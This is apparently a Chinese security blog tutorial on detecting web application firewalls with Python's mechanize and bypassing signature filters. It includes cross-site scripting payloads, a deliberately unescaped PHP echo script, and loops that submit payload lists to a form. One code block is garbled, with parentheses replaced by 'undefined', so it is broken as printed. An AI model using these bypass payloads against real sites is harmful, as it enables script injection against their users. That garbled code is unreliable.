回归最本质的信息安全

使用Python检测并绕过Web应用程序防火墙

2017年6月23日发布

33,093
3
6

导语:Web应用防火墙通常放置在Web服务器的前面,以过滤来自服务器的恶意流量。如果你去一家公司做渗透测试,他们忘记告诉你,他们使用的Web应用防火墙,可能会影响渗透测试进度。下图描绘了一个简单的Web应用程序防火墙的工作原理:

Web应用防火墙通常放置在Web服务器的前面,以过滤来自服务器的恶意流量。如果你去一家公司做渗透测试,他们忘记告诉你,他们使用的Web应用防火墙,可能会影响渗透测试进度。下图描绘了一个简单的Web应用程序防火墙的工作原理:

正如你可以看到它像Web流量和Web服务器之间的墙壁,通常现在Web应用防火墙是基于签名的。

什么是基于签名的防火墙?

在基于签名的防火墙中,您可以定义签名,因为您知道网络攻击也遵循类似的模式或签名。因此,我们可以定义匹配模式并阻止它们,即

Payload :- <svg><script>alert`1`<p>

上面定义的Payload是一种跨站点脚本攻击,我们知道所有这些攻击都可以包含以下字符“<script>”,所以为什么我们不定义一个可以阻止Web流量的签名,如果它包含这个字符串,我们可以定义2-3个签名如下:

    1. <script>

    2. alert(*)

第一个签名将阻止包含<script>子串的任何请求,第二个将阻止警报(任何文本)。那么这就是基于签名的防火墙的工作原理。

怎么知道有防火墙?

如果您正在进行渗透测试,并且您不知道有防火墙阻塞流量,因为它可能浪费了大量的时间,因为大多数时候,您的攻击有效负载被防火墙阻止,所以,在开始渗透测试之前,首先测试Web应用程序防火墙存在是一个好主意。

大多数防火墙现在就留下一些关于它们的轨迹,现在如果您使用上面定义的有效载荷攻击网络应用程序,并获得以下响应:

HTTP/1.1 406 Not Acceptable
Date: Mon, 10 Jan 2016
Server: nginx
Content-Type: text/html; charset=iso-8859-1
Not Acceptable!Not Acceptable! An appropriate representation of the

您可以清楚地看到,您的攻击被Mod_Security防火墙阻止。在本文中,我们将看到我们如何开发一个简单的python脚本,可以执行此任务检测防火墙并绕过它。

步骤1:定义HTML文档和PHP脚本!

我们必须定义我们的HTML文档来注入有效载荷和相应的PHP脚本来处理数据。我们在下面定义了这两个。

我们将使用以下HTML文档:

<html>
<body>
<form name="waf" action="waf.php" method="post">
Data: <input type="text" name="data"><br>
<input type="submit" value="Submit">
</form>
</body>
</html>

PHP脚本:

<html>
<body>
Data from the form : <?php echo $_POST["data"]; ?><br>
</body>
</html>

步骤2:准备恶意请求!

检测防火墙存在的第二步是创建一个可以被防火墙阻止的恶意跨站脚本请求。我们将使用一个名为“Mechanize”的python模块,了解更多关于此模块的信息,请阅读以下文章:

Automate Cross Site Scripting (XSS) attack using Beautiful Soup and Mechanize

如果您已经了解了Mechanize,可以跳过阅读文章。现在您了解了Mechanize,我们可以选择任何页面上提供的Web表单并提交请求。以下代码片段可用于做到这一点:

import mechanize as mec
maliciousRequest = mec.Browser()
formName = 'waf'
maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
maliciousRequest.select_form(formName)

让我们明白这个代码行:

  1. 在第一行,我们导入了mechanize模块,并给它一个简称'mec'供以后参考。

  2. 要使用mechanize下载网页,需要实例化浏览器。我们已经在代码的第二行中做到了。

  3. 在第一步,我们定义了我们的HTML文档,其中表单名称为“waf”,我们需要告诉mechanize选择此表单提交,因此我们在名为formName的变量中使用此名称。

  4. 比我们打开这个URL,就像我们在浏览器中一样。页面打开后,我们填写表单并提交数据,因此页面的打开与此相同。

  5. 最后我们选择了使用'select_form'函数传递它'formName'变量的形式。

正如你可以在HTML源代码中看到的那样,这个表单只有一个输入字段,我们将在该字段中注入我们的payload,一旦我们收到响应,我们将检查它的字符串以检测是否存在Web应用防火墙。

步骤3:准备有效载荷

在我们的HTML文档中,我们使用以下代码指定了一个输入字段:

 <input type =“text”name =“data”> <br>

您可以看到该字段的名称是“data”,我们可以使用以下代码定义此字段的输入:

crossSiteScriptingPayLoad = "<svg><script>alert`1`<p>"
maliciousRequest.form['data'] = crossSiteScriptingPayLoad

  1. 第一行将我们的有效载荷保存在变量中。

  2. 在第二行代码中,我们已将我们的有效内容分配给表单字段“数据”。

我们现在可以安全地提交此表格并检查答复。

步骤4:提交表单并记录回复

代码我将在此行提及后提交表单并记录回复:

maliciousRequest.submit()
response=maliciousRequest.response().read()
print response

  1. 提交表单

  2. 将响应保存在变量中。

  3. 打印回应。

由于我目前没有安装防火墙,所以我得到的响应是:

可以看到有效载荷被打印回我们,意味着应用程序代码中不存在过滤,并且由于没有防火墙,我们的请求也没有被阻止。

步骤5:检测防火墙的存在

名为“response”的变量包含从服务器获得的响应,我们可以使用响应来检测防火墙的存在。我们将尝试在本教程中检测到以下防火墙的存在。

  1. WebKnight

  2. mod_security

  3. Dot Defender

看看我们如何用python代码实现这一点:

if response.find('WebKnight') >= 0:
      print "Firewall detected: WebKnight"
elif response.find('Mod_Security') >= 0:
     print "Firewall detected: Mod Security"
elif response.find('Mod_Security') >= 0:
     print "Firewall detected: Mod Security"
elif response.find('dotDefender') >= 0:
     print "Firewall detected: Dot Defender"
else:
     print "No Firewall Present"

如果安装Web Knight防火墙并且我们的请求被阻止,响应字符串将在其中包含“WebKnight”,那么find函数将返回大于0的值,这意味着WebKnight防火墙存在。同样,我们也可以检查其他2个防火墙。

我们可以扩展这个小应用程序来检测多少个防火墙,但您必须知道响应行为。

使用强力来绕过防火墙过滤器

我在文章的开头提到,大多数防火墙都基于签名阻止请求。但是,您可以使用数千种方式构建payload。javascript比较复杂,我们可以列出有效负载,并尝试其中的每一个,记录每个响应并检查是否能够绕过防火墙。请注意,如果防火墙规则被明确定义,则此方法可能无法正常工作。让我们看看我们如何使用python来强爆:

listofPayloads = ['<dialog open="" onclose="alertundefined1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg><script>prompt&#40 1&#41<i>', '<a href="&#1;javascript:alertundefined1)">CLICK ME<a>']
for payLoads in listofPayloads:
   maliciousRequest = mec.Browserundefined)
   formName = 'waf'
   maliciousRequest.openundefined"http://check.cyberpersons.com/crossSiteCheck.html")
   maliciousRequest.select_formundefinedformName)
   maliciousRequest.form['data'] = payLoads
   maliciousRequest.submitundefined)
   response = maliciousRequest.responseundefined).readundefined)
   if response.findundefined'WebKnight') >= 0:
       print "Firewall detected: WebKnight"
   elif response.findundefined'Mod_Security') >= 0:
       print "Firewall detected: Mod Security"
   elif response.findundefined'Mod_Security') >= 0:
       print "Firewall detected: Mod Security"
   elif response.findundefined'dotDefender') >= 0:
       print "Firewall detected: Dot Defender"
   else:
       print "No Firewall Present"

  1. 在第一行,我们定义了3个有效载荷的列表,您可以扩展此列表,并根据需要添加多个有效负载。

  2. 然后在for循环中,我们做了与上面所做的相同的过程,但是这一次对于列表中的每个有效载荷。

  3. 收到响应后,我们再次比较看看防火墙是否存在。

因为我没有安装防火墙,我的输出是:

将HTML标签转换为Unicode或Hex实体

如果防火墙正在过滤html标签,如<>。我们可以发送相应的Unicode或Hex实体,看看它们是否被转换为原始形式,如果是这样,那么这也可能是一个入口点。以下代码可用于检查此过程:

  listofPayloads = ['<b>','u003cbu003e','x3cbx3e']
  for payLoads in listofPayloads:
    maliciousRequest = mec.Browser()
    formName = 'waf'
    maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
    maliciousRequest.select_form(formName)
    maliciousRequest.form['data'] = payLoads
    maliciousRequest.submit()
    response = maliciousRequest.response().read()
    print "---------------------------------------------------"
    print response
    print "---------------------------------------------------"

每次我们将发送编码的数据,在响应中,我们将检查是否转换或打印回而不进行转换,当我运行这个代码,我得到了这个输出:

表示没有编码的数据被转换为其原始格式。

结论

本文的目的是让您了解web应用防火墙,测试您网络的安全性,很多时候我们首先关心的应用程序的稳定性,但是我们忽略了安全部分,导致后期出现了严重的安全问题。

测试完整的源代码可以从这个链接下载。

如若转载,请注明原文地址: http://www.4hou.com/penetration/5698.html

点赞 6
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

愣娃

愣娃

这个人很懒,什么也没留下

发私信

发表评论

    longye
    longye 2017-06-23 17:29

    本篇已收录至“waf bypass的一万零一种姿势”

    lapua
    lapua 2017-06-23 16:37

    不知道防火墙的存在确实会存在渗透方向的错误引导,有了这个工具确实可以帮上大忙

    尹依玉
    尹依玉 2017-06-23 11:24

    确实,有的甲方啥都不懂,然后自己上了大保健全套还不跟我们说,最后累的半死还没攻进去,有这工具未来至少可以少走一点弯路。